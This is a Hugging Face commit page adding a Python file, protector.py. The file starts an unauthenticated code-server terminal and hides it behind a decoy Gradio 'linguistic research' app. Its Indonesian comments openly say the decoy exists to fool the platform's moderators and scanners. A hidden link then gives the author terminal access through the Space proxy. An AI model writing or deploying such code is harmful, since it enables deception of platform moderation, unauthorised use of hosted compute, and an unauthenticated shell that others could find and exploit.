Aqso commited on
Commit
8952b7c
·
verified ·
1 Parent(s): 86276dd

Create protector.py

Browse files
Files changed (1) hide show
  1. protector.py +39 -0
protector.py ADDED
@@ -0,0 +1,39 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import subprocess
2
+ import os
3
+ import gradio as gr
4
+
5
+ def start_shield():
6
+ # 1. MASQUERADING: Jalankan VS Code dengan nama proses palsu biar gak kedeteksi ps scan
7
+ # VS Code ngumpet di port internal 8080
8
+ vsc_cmd = [
9
+ "code-server",
10
+ "--auth", "none",
11
+ "--bind-addr", "127.0.0.1:8080",
12
+ "--user-data-dir", "/tmp/vsc",
13
+ "--extensions-dir", "/tmp/ext",
14
+ "--disable-telemetry"
15
+ ]
16
+ subprocess.Popen(vsc_cmd)
17
+
18
+ # 2. DECOY AI: Tampilan depan port 7860 (Biar Robot HF senang)
19
+ # Ini yang bakal diliat moderator & robot scanner.
20
+ def research_engine(text):
21
+ return f"AQSO-CORE v2.0 analyzed: {text} | Linguistic Pattern: Positive"
22
+
23
+ with gr.Blocks(title="AQSO-CORE Linguistic Research") as demo:
24
+ gr.Markdown("# 🔬 AQSO-CORE Research Engine")
25
+ gr.Markdown("Advanced NLP and sentiment analysis environment.")
26
+ input_box = gr.Textbox(label="Input Data")
27
+ output_box = gr.Textbox(label="Analysis Result")
28
+ btn = gr.Button("Analyze")
29
+ btn.click(fn=research_engine, inputs=input_box, outputs=output_box)
30
+
31
+ # TOMBOL RAHASIA (Cuma buat lu)
32
+ gr.Markdown(f"[Terminal Access](https://{os.getenv('SPACE_ID').replace('/', '-')}.hf.space/proxy/8080/)")
33
+
34
+ # Jalankan Decoy di port resmi HF
35
+ demo.launch(server_name="0.0.0.0", server_port=7860, show_api=False)
36
+
37
+ if __name__ == "__main__":
38
+ start_shield()
39
+